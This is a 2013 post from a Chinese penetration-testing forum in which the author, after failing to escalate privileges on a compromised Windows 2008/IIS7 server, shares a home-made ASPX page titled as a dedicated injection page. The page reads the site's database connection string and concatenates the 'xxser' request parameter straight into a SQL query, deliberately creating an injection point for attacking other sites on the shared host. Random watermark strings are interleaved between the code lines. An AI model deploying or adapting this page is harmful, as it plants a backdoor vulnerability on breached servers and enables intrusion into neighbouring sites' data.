中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
( `% j; V' c4 b1 P7 `+ T
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
; K% U0 a9 w2 c% t1 W
代码量不多,自己写个拉倒了。烦死了。
$ @" _( ?: ~% M2 `+ [0 {( W/ k
0 j: h! g4 K. V3 u
$ V7 A) g+ f0 E" t# |6 h: q, O! d0 }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
% O5 A2 [! h2 L! G: w) M' q
<html xmlns="http://www.w3.org/1999/xhtml">
9 R. W& E' D7 d6 ]6 Y P/ D2 J
<head runat="server">
. E0 d+ a) Y& Z) `) X( P! \
<title>暗影aspx构造注射专用页面</title>
' u B2 z) \$ U" @" ^+ {; P! `" k
</head>
- F8 h" N* J1 ~ [
<body>
* a1 G. Q, A U4 O1 x' D( A
<form id="form1" runat="server">
9 |: e: B6 K0 [8 i
<div>
) F- t! d# Q$ c/ P! V
<script language="c#" runat="server">
" \. R& d2 A# V5 x$ n+ p z5 k0 R
7 K7 O' [, m4 {0 Q" Y, c1 U
void page_init(object sender, EventArgs e)
U& U" g, l) l3 p* t3 {
{
9 U, z* }; N1 `9 \# K" I& c
9 G' q0 R) L# e, {. V
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
, B8 e5 y6 Z* g% _7 E+ G6 }" N) h
9 g( J$ U+ f6 Q" E
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
6 a1 |( U0 h& F! Z( |) Z
conn.Open();
: B/ y; l5 V' F/ I1 l( _
; X/ L! p0 L$ H7 x1 h
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
9 W0 H( o5 M1 V9 A. l% p
" p. r- z* A6 \ T
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
( _0 _5 p4 S: c) b( {" ? `
int x = command.ExecuteNonQuery();
0 u0 r [$ Q( m" i
Response.Write(i+"\n");
8 N$ [) a8 J4 ?7 ^8 ]
Response.Write(x);
' \# ]8 p6 q# K" j) B7 }
conn.Close();
& N! e3 N: s' N4 g1 L6 M
}
1 L6 W: N+ a8 c
& v, m( v a# X
</script>
1 }+ R; Y# ^# I9 ^3 v ~
</div>
, C# I; E, x3 R& P2 s$ Q) x
</form>
+ }" ~* s6 d- [ C) M9 j, G
</body>
# n L6 n, e; U' Q8 L
</html>
" }# m+ ^! S% d2 e3 b
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2